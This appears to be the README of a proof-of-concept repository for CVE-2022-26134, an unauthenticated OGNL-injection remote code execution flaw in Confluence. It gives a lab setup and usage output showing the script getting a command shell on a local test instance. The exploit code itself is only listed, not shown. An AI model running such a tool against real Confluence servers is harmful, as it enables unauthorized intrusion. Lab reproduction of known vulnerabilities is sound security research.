Exploit for CVE-2022-26134: Confluence Pre-Auth Remote Code Execution via OGNL Injection # Exploit for CVE-2022-26134: Confluence Pre-Auth Remote Code Execution via OGNL Injection
_Another exploit in OGNL Land_
## Description
Confluence is a web-based corporate wiki developed by Australian software company Atlassian.
On June 02, 2022 Atlassian released a security advisory for their Confluence Server and Data Center applications, highlighting a critical severity unauthenticated remote code execution vulnerability. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.
## Setup
To setup your lab, run `start_conflunce.sh` and follow the instructions given [here](https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134).
## Usage
```bash
$ ./confluence-exploit.py
usage: confluence-exploit.py [-h] -u URL
confluence-exploit.py: error: the following arguments are required: -u/--url
```
```bash
$ ./confluence-exploit.py -u http://127.0.0.1:8090
🔗 URL: http://127.0.0.1:8090
👉 (id): whoami
confluence
```
## References
- https://www.rapid7.com/ja/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
- Infosec Twitter
[4.0K] /data/pocs/80b468de3e10e72a65b3749792a8f8b8cdd5e05e
├── [2.5K] confluence-exploit.py
├── [1.2K] README.md
└── [1.9K] start_confluence.sh
0 directories, 3 files